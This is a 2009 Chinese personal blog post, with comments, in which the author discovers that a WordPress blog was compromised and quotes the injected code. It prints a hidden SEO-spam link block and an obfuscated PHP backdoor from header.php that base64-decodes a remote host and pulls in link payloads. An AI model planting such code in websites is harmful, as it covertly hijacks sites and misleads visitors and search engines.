被黑了?
本文按署名·非商业用途·保持一致授权作者:
,发表于2009年08月08日23时33分
发现所有的页面都被加了这么一串代码。。
<div id='header_code'><font style="position:absolute;overflow:hidden;height:0;width:0"><a href="http://google.com">google</a><a href="http://yahoo.com">yahoo</a><a href="http://bing.com">bing</a></font></div>
发现header.php被加了这段代码。。。
< ?php /* wp_remote_fopen procedure */ $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3Mv'; $opt_id='23986476fd39cf9a517f9f56d1f2a173'; $blarr=get_option('cache_vars'); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.md5'))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.txt')); update_option('cache_vars',$blarr); } $blarr=unserialize(base64_decode(get_option('cache_vars'))); if($blarr['hide_text']!='' && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=''; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=''; foreach($blarr['links'] as $k=>$v) $txt_out.='<a href="'.$v.'">'.$k.'</a>'; echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>阿~~应该是程序自动扫的一个wp的已经公开的漏洞吧,我的博客没什么可以搞的。。
懒得改回来,因为我不想通过wp的后台来改。。我希望可以直接本地修改然后ci,然后up。。。但是我已经不记得登录服务器的密码了。。
找个博客服务商算了。。blogbus,还是豆瓣捏?blogsome似乎也不错。。
最近玩wii sports的拳击上瘾了,上肢练得又粗又壮。。谁有更好的拳击游戏介绍一下?
最近玩花生大大做的iFighter也有点上瘾了。。
2009-08-09 00:23:57
来 home.verycd.com
2009-08-09 00:24:45
突然想到,
如果是用 git 部署的,
一句 git reset –hard HEAD
就全恢复了,呵呵。
2009-08-09 12:39:56
囧,Dash也开始弄SNS了啊。。。
2009-08-11 17:52:24
verycd也搞了个sns,还是uchome的……
2009-08-11 18:25:12
又是一位电驴达人?支持电驴··
2009-08-15 16:44:04
堕落啊,居然去搞uchome
2009-12-31 04:09:09
2010-03-09 01:21:26
2010-03-20 02:36:15